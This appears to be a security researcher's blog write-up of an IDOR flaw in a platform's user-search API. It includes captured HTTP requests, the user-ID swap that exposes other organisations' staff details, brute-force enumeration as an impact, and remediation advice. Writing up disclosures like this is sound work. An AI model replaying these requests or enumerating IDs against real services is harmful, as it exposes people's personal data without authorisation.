Critical IDOR Vulnerability Exposing Users Details via API Search Endpoint

Assalam o Walikum folks,

Welcome to my blog! I’m thrilled to present my first detailed write-up, which dives deep into a critical vulnerability I uncovered during a recent pentest project. As an ethical hacker with a deep-seated passion for security, I specialize in identifying and mitigating various vulnerabilities, including SQL injection, Insecure Direct Object Reference (IDOR), privilege escalation, and more, with a particular focus on API testing.

Let’s dive into the technical details of this discovery.

Vulnerability Summary

During a routine security assessment of the Target security platform, I uncovered a critical vulnerability categorized as Insecure Direct Object Reference (IDOR). This flaw has severe implications for the security and privacy of user data on the platform. The vulnerability allows an authenticated standard user to access sensitive information belonging to users from other organizations simply by manipulating the user ID parameter in the API search endpoint. The compromised data includes names, email addresses, job functions, locations, and account statuses. This critical issue could lead to significant data breaches, impacting both user privacy and organizational security.

What is IDOR?

Insecure Direct Object Reference (IDOR) is a type of access control vulnerability that occurs when an attacker is able to access or manipulate objects (such as files or database records) that they should not be authorized to interact with. This typically happens due to insufficient validation of user inputs that control access to these objects. In the case of IDOR, the attacker can modify parameters in a request to gain unauthorized access to data or perform actions that they are not permitted to do.

For example, if an API endpoint accepts a user ID to fetch user details, and there is no proper validation on the server side, an attacker could alter the user ID parameter to access details of users other than their own.

Vulnerability Details

  • Vulnerability Type: Insecure Direct Object Reference (IDOR)
  • Severity: Critical
  • Affected Endpoint: /api/core/v1/users/search/{user_id}?_={timestamp}&page=1&pageSize=20

Steps to Reproduce

  1. Login as a Standard User:

  2. Capture Search Request:

    • Utilize Burp Suite to capture the API request:

GET /api/core/v1/users/search/101080?_=1719741169465&page=1&pageSize=20 HTTP/2
Host: security.target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://security.target.com/platform/Org/1035/User/List/RO?NewUserId=101080
Authorization: Bearer <your_jwt_token>
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: 0
Pragma: no-cache
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

 

 Modify the User ID:

Alter the user ID in the captured request from 101080 to a different organization ID, such as 1026.

Resend the Modified Request:

  • Use the modified request to observe:

GET /api/core/v1/users/search/1026?_=1719741169465&page=1&pageSize=20 HTTP/2
Host: security.target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://security.target.com/platform/Org/1035/User/List/RO?NewUserId=101080
Authorization: Bearer <your_jwt_token>
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: 0
Pragma: no-cache
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailer
 

Observe the Response:
 

 

The response will reveal detailed information about all users in the organization with ID 1026, including sensitive details like names, email addresses, job functions, locations, and account statuses.

IMPACT

The exploitation of this vulnerability allows attackers to:
  1. Gain unauthorized access to sensitive user data across different organizations.
  2. Collect extensive personal information such as names, email addresses, job functions, locations, and account statuses.
  3. Potentially execute brute-force attacks on user IDs to amass comprehensive user data.

Such access can lead to major data breaches, posing significant privacy and security risks to both individual users and the organization as a whole.

Detailed Remediation

To address and mitigate this vulnerability, the following steps should be implemented:

  • Implement Strict Server-Side Access Controls: Ensure that users can only access data they are explicitly authorized to view.
  • Use Indirect Object References: Replace direct object references (like user IDs) with indirect references, such as session tokens.
  • Validate Input Parameters: Enforce robust server-side validation to prevent unauthorized data access.
  • Implement Role-Based Access Control (RBAC): Apply the principle of least privilege to limit access based on user roles.
  • Minimize Data in API Responses: Ensure that API responses contain only necessary data.
  • Enable Logging and Monitoring: Set up logging and monitoring to detect unauthorized access attempts and regularly review the logs.
  • User Education: Inform users about the risks associated with URL tampering and provide guidance for reporting potential security issues.

By adopting these measures, Target can significantly enhance its security posture and safeguard user data from unauthorized access.

Timeline

  • Date Discovered: 5 July 2024
  • Date Reported: 5 July 2024
  • Date Fixed: Not Fixed

Reporter Information

Thank you for reading my detailed write-up. I hope this information helps in understanding the critical nature of IDOR vulnerabilities and the importance of implementing robust security controls to protect sensitive user data. Stay tuned for more updates and insights into the world of security research and ethical hacking.


 


1 comment